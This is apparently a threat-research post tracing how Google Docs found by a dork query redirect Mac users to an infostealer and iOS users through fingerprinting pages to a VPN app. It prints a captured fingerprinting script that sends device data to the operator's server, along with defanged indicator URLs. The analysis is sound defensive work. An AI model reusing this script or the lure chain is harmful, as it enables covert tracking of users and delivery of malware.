Google Dorks → iOS infostealer
Google Dorking site:docs.google.com intitle:"Download ZIP" reveals thousands of Google Docs trying to deliver malware.
Clicking the links embedded in these docs will result in different things depending on your browser's User-Agent. On Mac, you'll either be redirected to a MacSync infostealer, or to a URL Removed page. However on iOS, while we are sometimes redirected to sites serving adult content, the gross majority redirect to pages like this:
We also see a middleman: a URL shortener that grabs the user's User-Agent to decide which page to serve.
The WHOIS data for the middlemen show that they were all created earlier this year. Clicking OK or really anywhere on the iOS pages will take the user through 2 more redirects, including a fingerprinting "Advanced Data Collection" module with Russian comments:
<title>Redirecting...</title>
<style>
* { margin: 0; padding: 0; }
html, body { width: 100%; height: 100%; background: #FFFFFF; }
</style>
</head>
<body>
<script>
var universalLink = "https:\/\/domain.work\/crm\/install.php?data=eyJjbGlja19pZCI6ImQ1N2Vhc2Z1YTdwczczYzNscnRnIiwiZ2VvX2NjIjoiVVMiLCJ0cmFmZmljX29mZmVyIjoiNDQiLCJhcHBfaWQiOjgsInVpZCI6Njc2NjEyMDEsInRva2VuMSI6IjM0NTgwMSIsImNhbXBhaWduX2lkIjoiMTYzOCIsInNldF9pZCI6ODI4NzIyOCwidHJhY2tlcl9zb3VyY2UiOiJiaW5vbSJ9";
var resolutionPixel = "https:\/\/domain.work\/crm\/resolution.php?id=67661201";
// ============================================
// 🔥 FINGERPRINT v2.0 - Расширенный сбор данных
// ============================================
function collectFingerprint() {
var fp = {};
// Базовые параметры экрана
fp.w = screen.width;
fp.h = screen.height;
fp.scale = window.devicePixelRatio || 1;
fp.screen = fp.w + 'x' + fp.h + '@' + fp.scale;
// Timezone (ОЧЕНЬ важно для matching!)
try {
fp.timezone = Intl.DateTimeFormat().resolvedOptions().timeZone || '';
} catch(e) {
fp.timezone = '';
}
// Timezone offset в часах (например, 3 для UTC+3)
fp.tz_offset = -(new Date().getTimezoneOffset() / 60);
// Язык и регион
var lang = navigator.language || navigator.userLanguage || '';
var langParts = lang.split('-');
fp.language = lang;
fp.lang_code = langParts[0] || ''; // "ru"
fp.region = langParts[1] || ''; // "RU"
// Preferred languages (важно для matching)
fp.pref_langs = '';
if (navigator.languages && navigator.languages.length > 0) {
fp.pref_langs = navigator.languages.slice(0, 3).join(',');
}
// 24-часовой формат времени
fp.is_24h = is24HourFormat() ? '1' : '0';
// Метрическая система (определяем по региону)
var imperialRegions = ['US', 'LR', 'MM'];
fp.metric = imperialRegions.includes(fp.region.toUpperCase()) ? '0' : '1';
// Генерируем hash для быстрого matching
fp.hash = generateFpHash(fp);
return fp;
}
function is24HourFormat() {
try {
var date = new Date(2000, 0, 1, 13, 0, 0);
var timeString = date.toLocaleTimeString();
return !timeString.match(/AM|PM/i);
} catch(e) {
return true;
}
}
function generateFpHash(fp) {
// Создаем уникальный hash на основе стабильных параметров
var fpString = [
fp.w, fp.h, fp.scale,
fp.timezone, fp.tz_offset,
fp.language, fp.is_24h
].join('|');
var hash = 0;
for (var i = 0; i < fpString.length; i++) {
hash = ((hash << 5) - hash) + fpString.charCodeAt(i);
hash = hash & hash;
}
return Math.abs(hash).toString(36);
}
// ============================================
// Собираем и отправляем fingerprint
// ============================================
(function() {
var fp = collectFingerprint();
// Формируем URL параметры
var params = [
'w=' + fp.w,
'h=' + fp.h,
'fp_hash=' + encodeURIComponent(fp.hash),
'fp_timezone=' + encodeURIComponent(fp.timezone),
'fp_tz_offset=' + fp.tz_offset,
'fp_language=' + encodeURIComponent(fp.language),
'fp_region=' + encodeURIComponent(fp.region),
'fp_screen=' + encodeURIComponent(fp.screen),
'fp_scale=' + fp.scale,
'fp_pref_langs=' + encodeURIComponent(fp.pref_langs),
'fp_is_24h=' + fp.is_24h,
'fp_metric=' + fp.metric
].join('&');
// Отправляем fingerprint
var xhr = new XMLHttpRequest();
xhr.open("GET", resolutionPixel + "&" + params, true);
xhr.send();
// Редирект на Universal Link (с небольшой задержкой для fingerprint)
setTimeout(function() {
window.location.href = universalLink;
}, 150);
})();
</script>Which then leads into a "Universal Link", redirecting the user to the App Store. The redirect is always for the same app, and always with the Russian HTML comment Мгновенный редирект в App Store. The app is StrongNet VPN: Privacy Defense.
hxxps://docs.google.com/file/d/1NfMIVpnNQMeLbD6jHNN1qw5nQ3BeOqs1/
hxxps://ccgcg.com/2DXe8p
hxxps://phone-protection.pro/smt-sn109/index.php?lp_key=176685e0af439bdd574db98df179bd18e3bf407439&trafficsource_name=SMT_CPA%20%7C%20(ts_offer=44)&campaign=1635&trafficsource=47&lander=313&country_code=US&device_model=iPhone#
https://strong-super.website/click.php?lp=1
hxxps://strong-info.work/crm/install.php?clickid=d57ij6vua7ps73cdvat0&os_version=18.6&country_code=US&ts_offer=44&aid=8&unixtime=1766795675&t1=345801&t2=&t3=&t4=&t5=&lp=316&campaign_id=1639&set=8287228
hxxps://strong-info.work/crm/install.php?data=eyJjbGlja19pZCI6ImQ1N2lqNnZ1YTdwczczY2R2YXQwIiwiZ2VvX2NjIjoiVVMiLCJ0cmFmZmljX29mZmVyIjoiNDQiLCJhcHBfaWQiOjgsInVpZCI6Njc2ODU4MzEsInRva2VuMSI6IjM0NTgwMSIsImNhbXBhaWduX2lkIjoiMTYzOSIsInNldF9pZCI6ODI4NzIyOCwidHJhY2tlcl9zb3VyY2UiOiJiaW5vbSJ9
hxxps://apps.apple.com/us/app/strongnet-vpn-privacy-defence/id6477825452full redirect chain